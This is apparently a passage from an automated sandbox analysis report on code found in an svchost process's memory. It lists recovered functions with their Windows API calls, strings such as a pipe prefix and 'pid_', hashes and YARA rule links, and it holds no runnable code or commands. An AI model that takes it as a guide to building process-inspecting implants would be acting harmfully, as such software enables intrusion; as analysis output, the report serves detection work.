csm, xrefs: 00000195DE1AAAF6

Memory Dump Source

Source File: 0000000C.00000002.3553296187.00000195DE1A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DE1A0000, based on PE: true

Associated: 0000000C.00000002.3552420389.00000195DE1A0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3554354654.00000195DE1B5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3555153189.00000195DE1C0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3556052258.00000195DE1C2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3556918393.00000195DE1C9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_195de1a0000_svchost.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
Instruction ID: 10741a88c2dc58106a4ef11c8ab453dcffef895e7401875467749c3909827ec7
Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
Instruction Fuzzy Hash: EE51CE32300F808BEB76CFE190663A877E2F354B94F544116DA8967B95CB38E49EE700

Function 00000195DE1AA6FC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

EncodePointer.KERNEL32 ref: 00000195DE1AA75B
_CallSETranslator.LIBVCRUNTIME ref: 00000195DE1AA7A7

Strings

MOC, xrefs: 00000195DE1AA76F
RCC, xrefs: 00000195DE1AA777

Memory Dump Source

Source File: 0000000C.00000002.3553296187.00000195DE1A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DE1A0000, based on PE: true

Associated: 0000000C.00000002.3552420389.00000195DE1A0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3554354654.00000195DE1B5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3555153189.00000195DE1C0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3556052258.00000195DE1C2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3556918393.00000195DE1C9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_195de1a0000_svchost.jbxd

Similarity

API ID: CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 3544855599-2084237596
Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
Instruction ID: 6d126233387588a9d511bf4a922610e9b0cb6977851d1ce647f370eaa07a4bb7
Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
Instruction Fuzzy Hash: 3261AE72608FC485DB32CF95E4513EAB7E1F785B94F044215EB9923B95DB78D099CB00

Function 00000195DD5CA6FC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

EncodePointer.KERNEL32 ref: 00000195DD5CA75B
_CallSETranslator.LIBVCRUNTIME ref: 00000195DD5CA7A7

Strings

MOC, xrefs: 00000195DD5CA76F
RCC, xrefs: 00000195DD5CA777

Memory Dump Source

Source File: 0000000C.00000002.3522631410.00000195DD5C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true

Associated: 0000000C.00000002.3521736170.00000195DD5C0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3523800267.00000195DD5D5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3524710151.00000195DD5E0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3525689535.00000195DD5E2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3526684099.00000195DD5E9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_195dd5c0000_svchost.jbxd

Similarity

API ID: CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 3544855599-2084237596
Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
Instruction ID: bb062c9c1765dcf9e58b75b697d660edbab0bd9550349e412ca49f081f98f7f1
Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
Instruction Fuzzy Hash: 2E619F72505FC886EB328F59E4517DABBE1F785B98F044215EB9863B99DB78C190CB00

Function 00000195DD5CAAAC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00000195DD5CAAD4
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 00000195DD5CABBC

Strings

csm, xrefs: 00000195DD5CAAF6
csm, xrefs: 00000195DD5CAC0E

Memory Dump Source

Source File: 0000000C.00000002.3522631410.00000195DD5C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true

Associated: 0000000C.00000002.3521736170.00000195DD5C0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3523800267.00000195DD5D5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3524710151.00000195DD5E0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3525689535.00000195DD5E2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3526684099.00000195DD5E9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_195dd5c0000_svchost.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
Instruction ID: 3764e295dae51436190c53ee2acce7a6f14555dac3af3dabbcb84ae50abe31cc
Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
Instruction Fuzzy Hash: 5351A532101B888BEB768F99D5643D87BE2F355B98F144116EA89E7FD5CB39C450CB01

Function 00000195DD599EAC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00000195DD599ED4
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 00000195DD599FBC

Strings

csm, xrefs: 00000195DD59A00E
csm, xrefs: 00000195DD599EF6

Memory Dump Source

Source File: 0000000C.00000003.2166828055.00000195DD590000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD590000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_3_195dd590000_svchost.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
Instruction ID: af73907501829587e655eeb5389c7aee1a7da3a0afcfc989cf125ffa9d2d8bfb
Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
Instruction Fuzzy Hash: DE51DF32200B80CAEB768FA1D164398B7E6F355B95F145116DB8967FD5CB3AC490CF01

Function 00000195DE1A3950 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

StrCmpNW.SHLWAPI ref: 00000195DE1A3972
StrStrW.SHLWAPI ref: 00000195DE1A3990
StrToIntW.SHLWAPI ref: 00000195DE1A39B7

Part of subcall function 00000195DE1A1A30: OpenProcess.KERNEL32 ref: 00000195DE1A1A56
Part of subcall function 00000195DE1A1A30: K32GetModuleFileNameExW.KERNEL32 ref: 00000195DE1A1A74
Part of subcall function 00000195DE1A1A30: PathFindFileNameW.SHLWAPI ref: 00000195DE1A1A83
Part of subcall function 00000195DE1A1A30: lstrlenW.KERNEL32 ref: 00000195DE1A1A8F
Part of subcall function 00000195DE1A1A30: StrCpyW.SHLWAPI ref: 00000195DE1A1AA2
Part of subcall function 00000195DE1A1A30: CloseHandle.KERNEL32 ref: 00000195DE1A1AB0

Part of subcall function 00000195DE1A3F88: StrCmpNIW.SHLWAPI(?,?,?,00000195DE1A272F), ref: 00000195DE1A3FA0

Strings

pid_, xrefs: 00000195DE1A3968

Memory Dump Source

Source File: 0000000C.00000002.3553296187.00000195DE1A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DE1A0000, based on PE: true

Associated: 0000000C.00000002.3552420389.00000195DE1A0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3554354654.00000195DE1B5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3555153189.00000195DE1C0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3556052258.00000195DE1C2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3556918393.00000195DE1C9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_195de1a0000_svchost.jbxd

Similarity

API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
String ID: pid_
API String ID: 517849248-4147670505
Opcode ID: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
Instruction ID: c8fb80237bfc33b73c85fd3995de16dad7fef7cca13a6044f95ba4fbf0e2270b
Opcode Fuzzy Hash: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
Instruction Fuzzy Hash: B3118731310F9191EB13DBE5E8223EE62E6F795780F8440259E49E3794EF68E90ED700

Function 00000195DD5C3950 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

StrCmpNW.SHLWAPI ref: 00000195DD5C3972
StrStrW.SHLWAPI ref: 00000195DD5C3990
StrToIntW.SHLWAPI ref: 00000195DD5C39B7

Part of subcall function 00000195DD5C1A30: OpenProcess.KERNEL32 ref: 00000195DD5C1A56
Part of subcall function 00000195DD5C1A30: K32GetModuleFileNameExW.KERNEL32 ref: 00000195DD5C1A74
Part of subcall function 00000195DD5C1A30: PathFindFileNameW.SHLWAPI ref: 00000195DD5C1A83
Part of subcall function 00000195DD5C1A30: lstrlenW.KERNEL32 ref: 00000195DD5C1A8F
Part of subcall function 00000195DD5C1A30: StrCpyW.SHLWAPI ref: 00000195DD5C1AA2
Part of subcall function 00000195DD5C1A30: CloseHandle.KERNEL32 ref: 00000195DD5C1AB0

Part of subcall function 00000195DD5C3F88: StrCmpNIW.KERNELBASE(?,?,?,00000195DD5C272F), ref: 00000195DD5C3FA0

Strings

pid_, xrefs: 00000195DD5C3968

Memory Dump Source

Source File: 0000000C.00000002.3522631410.00000195DD5C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true

Associated: 0000000C.00000002.3521736170.00000195DD5C0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3523800267.00000195DD5D5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3524710151.00000195DD5E0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3525689535.00000195DD5E2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3526684099.00000195DD5E9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_195dd5c0000_svchost.jbxd

Similarity

API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
String ID: pid_
API String ID: 517849248-4147670505
Opcode ID: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
Instruction ID: 61ed0a467d52f15948061a26027edb96aad001ca45d9e63bb8c13d5b37f8608f
Opcode Fuzzy Hash: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
Instruction Fuzzy Hash: 50119331311F8992FB129BA9EC203DA63E6F748780F804425AE4AE3FD4EF68C955C700

Function 00000195DE1B1FA8 Relevance: 6.3, APIs: 4, Instructions: 304fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 00000195DE1B2027
WriteFile.KERNEL32 ref: 00000195DE1B2304
WriteFile.KERNEL32 ref: 00000195DE1B234A
GetLastError.KERNEL32 ref: 00000195DE1B2409

Memory Dump Source

Source File: 0000000C.00000002.3553296187.00000195DE1A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DE1A0000, based on PE: true

Associated: 0000000C.00000002.3552420389.00000195DE1A0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3554354654.00000195DE1B5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3555153189.00000195DE1C0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3556052258.00000195DE1C2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3556918393.00000195DE1C9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_195de1a0000_svchost.jbxd

Similarity

API ID: FileWrite$ConsoleErrorLastOutput
String ID:
API String ID: 2718003287-0
Opcode ID: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
Instruction ID: 31948b74c075dbed69a21029e0dc2a84cdf6468006f436d74313c9b7727a3dbf
Opcode Fuzzy Hash: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
Instruction Fuzzy Hash: EBD1CF32B14B8489E712CFE5D4502EC3BB2F396B99F504216DE6DABB99DA34D10ED340

Function 00000195DD5D1FA8 Relevance: 6.3, APIs: 4, Instructions: 304fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 00000195DD5D2027
WriteFile.KERNEL32 ref: 00000195DD5D2304
WriteFile.KERNEL32 ref: 00000195DD5D234A
GetLastError.KERNEL32 ref: 00000195DD5D2409

Memory Dump Source

Source File: 0000000C.00000002.3522631410.00000195DD5C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true

Associated: 0000000C.00000002.3521736170.00000195DD5C0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3523800267.00000195DD5D5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3524710151.00000195DD5E0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3525689535.00000195DD5E2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3526684099.00000195DD5E9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_195dd5c0000_svchost.jbxd

Similarity

API ID: FileWrite$ConsoleErrorLastOutput
String ID:
API String ID: 2718003287-0
Opcode ID: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
Instruction ID: 472e025cdd6ef7e503bc2a2dcd81ee18ef5c8e76ab51aef6eb20d1c8849fb58d
Opcode Fuzzy Hash: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
Instruction Fuzzy Hash: B6D1CB32715A848AE712CFAAD460ADC37F2F395B98F844216DE5EA7F99DA34C106C350

Function 00000195DE1A14A0 Relevance: 6.3, APIs: 5, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00000195DE1A14C6
HeapFree.KERNEL32 ref: 00000195DE1A14D5
GetProcessHeap.KERNEL32 ref: 00000195DE1A14E2
HeapFree.KERNEL32 ref: 00000195DE1A14F1
GetProcessHeap.KERNEL32 ref: 00000195DE1A1501

Memory Dump Source

Source File: 0000000C.00000002.3553296187.00000195DE1A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DE1A0000, based on PE: true

Associated: 0000000C.00000002.3552420389.00000195DE1A0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3554354654.00000195DE1B5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3555153189.00000195DE1C0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3556052258.00000195DE1C2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3556918393.00000195DE1C9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_195de1a0000_svchost.jbxd

Similarity

API ID: Heap$Process$Free
String ID:
API String ID: 3168794593-0
Opcode ID: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
Instruction ID: 34ba647b417854545887cb3649267efbc127a782600c2e3c08be315bc81a3ee6
Opcode Fuzzy Hash: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
Instruction Fuzzy Hash: 8F013232710F809AE716DFA6A81429977E7F789F81F094029DB4963728DF38E096C740

Function 00000195DD5C14A0 Relevance: 6.3, APIs: 5, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00000195DD5C14C6
HeapFree.KERNEL32 ref: 00000195DD5C14D5
GetProcessHeap.KERNEL32 ref: 00000195DD5C14E2
HeapFree.KERNEL32 ref: 00000195DD5C14F1
GetProcessHeap.KERNEL32 ref: 00000195DD5C1501

Memory Dump Source

Source File: 0000000C.00000002.3522631410.00000195DD5C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true

Associated: 0000000C.00000002.3521736170.00000195DD5C0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3523800267.00000195DD5D5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3524710151.00000195DD5E0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3525689535.00000195DD5E2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3526684099.00000195DD5E9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_195dd5c0000_svchost.jbxd

Similarity

API ID: Heap$Process$Free
String ID:
API String ID: 3168794593-0
Opcode ID: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
Instruction ID: 6f7721837b1bf4a809e33c9f74030b0cf998fba60b4ac646c8e75c6cb299eb4a
Opcode Fuzzy Hash: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
Instruction Fuzzy Hash: E5016932610F80DAE715DFA6E8145897BE2F789F80B094025DF9A63B28DF34D051C740

Function 00000195DE1B28F4 Relevance: 6.2, APIs: 4, Instructions: 229COMMON

Download Yara Rule

APIs

GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000195DE1B28DF), ref: 00000195DE1B2A12

Memory Dump Source

Source File: 0000000C.00000002.3553296187.00000195DE1A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DE1A0000, based on PE: true

Associated: 0000000C.00000002.3552420389.00000195DE1A0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3554354654.00000195DE1B5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3555153189.00000195DE1C0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3556052258.00000195DE1C2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3556918393.00000195DE1C9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_195de1a0000_svchost.jbxd

Similarity

API ID: ConsoleMode
String ID:
API String ID: 4145635619-0
Opcode ID: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
Instruction ID: 02965a8b8e668252ed54d2dee24e17265d01d4e6d2b95822cbf3c9cfbbd9287c
Opcode Fuzzy Hash: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
Instruction Fuzzy Hash: 2C91D032710E5089FB629FE594603ED2BE6F396B89F444106DE5A77A85DB34E48EE300

Function 00000195DD5D28F4 Relevance: 6.2, APIs: 4, Instructions: 229COMMON

Download Yara Rule

APIs

GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000195DD5D28DF), ref: 00000195DD5D2A12

Memory Dump Source

Source File: 0000000C.00000002.3522631410.00000195DD5C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true

Associated: 0000000C.00000002.3521736170.00000195DD5C0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3523800267.00000195DD5D5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3524710151.00000195DD5E0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3525689535.00000195DD5E2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3526684099.00000195DD5E9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_195dd5c0000_svchost.jbxd

Similarity

API ID: ConsoleMode
String ID:
API String ID: 4145635619-0
Opcode ID: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
Instruction ID: c754ab53e5f4cf025cc88317a85fcba86c6cffdacda0aa9b1f1f469b1c2d2795
Opcode Fuzzy Hash: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
Instruction Fuzzy Hash: AA91EF32710E5199FB62CFA69860BED2BE2F355B88F44410ADE4A77F85DA74C486C320

Function 00000195DE1A8090 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00000195DE1A80BC
GetCurrentThreadId.KERNEL32 ref: 00000195DE1A80CA
GetCurrentProcessId.KERNEL32 ref: 00000195DE1A80D6
QueryPerformanceCounter.KERNEL32 ref: 00000195DE1A80E6

Memory Dump Source

Source File: 0000000C.00000002.3553296187.00000195DE1A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DE1A0000, based on PE: true

Associated: 0000000C.00000002.3552420389.00000195DE1A0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3554354654.00000195DE1B5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3555153189.00000195DE1C0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3556052258.00000195DE1C2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3556918393.00000195DE1C9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_195de1a0000_svchost.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
Instruction ID: 8ca517f9b7ac8f6baa2d5c867a72ea658b852af3febf746d89eba981be5c2785
Opcode Fuzzy Hash: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
Instruction Fuzzy Hash: 31112736711F058AEB01CFE0E8653A833E6F759798F440E21EA6DA67A4DB78D1689340

Function 00000195DD5C8090 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00000195DD5C80BC
GetCurrentThreadId.KERNEL32 ref: 00000195DD5C80CA
GetCurrentProcessId.KERNEL32 ref: 00000195DD5C80D6
QueryPerformanceCounter.KERNEL32 ref: 00000195DD5C80E6

Memory Dump Source

Source File: 0000000C.00000002.3522631410.00000195DD5C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true

Associated: 0000000C.00000002.3521736170.00000195DD5C0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3523800267.00000195DD5D5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3524710151.00000195DD5E0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3525689535.00000195DD5E2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3526684099.00000195DD5E9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_195dd5c0000_svchost.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
Instruction ID: c6d890b89c49a7a6987264fcd7d01e9e06fb4d1e539db11f6da52319577bfeea
Opcode Fuzzy Hash: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
Instruction Fuzzy Hash: 68115B36711F048AEB00DFA4E8643E833E4F719759F840E21EA6E96BA8DF78C1588340

Function 00000195DE1A27E8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 00000195DE1A28CC
StrCpyW.SHLWAPI ref: 00000195DE1A28E5

Part of subcall function 00000195DE1A3F88: StrCmpNIW.SHLWAPI(?,?,?,00000195DE1A272F), ref: 00000195DE1A3FA0

Strings

\\.\pipe\, xrefs: 00000195DE1A28D7

Memory Dump Source

Source File: 0000000C.00000002.3553296187.00000195DE1A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DE1A0000, based on PE: true

Associated: 0000000C.00000002.3552420389.00000195DE1A0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3554354654.00000195DE1B5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3555153189.00000195DE1C0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3556052258.00000195DE1C2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3556918393.00000195DE1C9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_195de1a0000_svchost.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
Instruction ID: 5c5dbde42ff70c2315b6d52bc1034719d03be7e227bb47cdba95bab47f1f08c9
Opcode Fuzzy Hash: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
Instruction Fuzzy Hash: 1D719E36340F9242E776DFE698653FA67D6F385B84F400016DD4AA3F88DA34D60AE700

Function 00000195DD5C27E8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 00000195DD5C28CC
StrCpyW.SHLWAPI ref: 00000195DD5C28E5

Part of subcall function 00000195DD5C3F88: StrCmpNIW.KERNELBASE(?,?,?,00000195DD5C272F), ref: 00000195DD5C3FA0

Strings

\\.\pipe\, xrefs: 00000195DD5C28D7

Memory Dump Source

Source File: 0000000C.00000002.3522631410.00000195DD5C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true

Associated: 0000000C.00000002.3521736170.00000195DD5C0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3523800267.00000195DD5D5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3524710151.00000195DD5E0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3525689535.00000195DD5E2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3526684099.00000195DD5E9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_195dd5c0000_svchost.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
Instruction ID: 376fff5770a4a596e260cc35a879d7b55ac1e18754fca75a20926b12c4d5d300
Opcode Fuzzy Hash: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
Instruction Fuzzy Hash: E971A136201F8952E736AFAA98647EE77D6F385BC4F484026DD0AA3F88DE75C640C740

Function 00000195DD5980A0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 154COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00000195DD5980CB
_IsNonwritableInCurrentImage.LIBCMT ref: 00000195DD598162

Strings

csm, xrefs: 00000195DD598149

Memory Dump Source

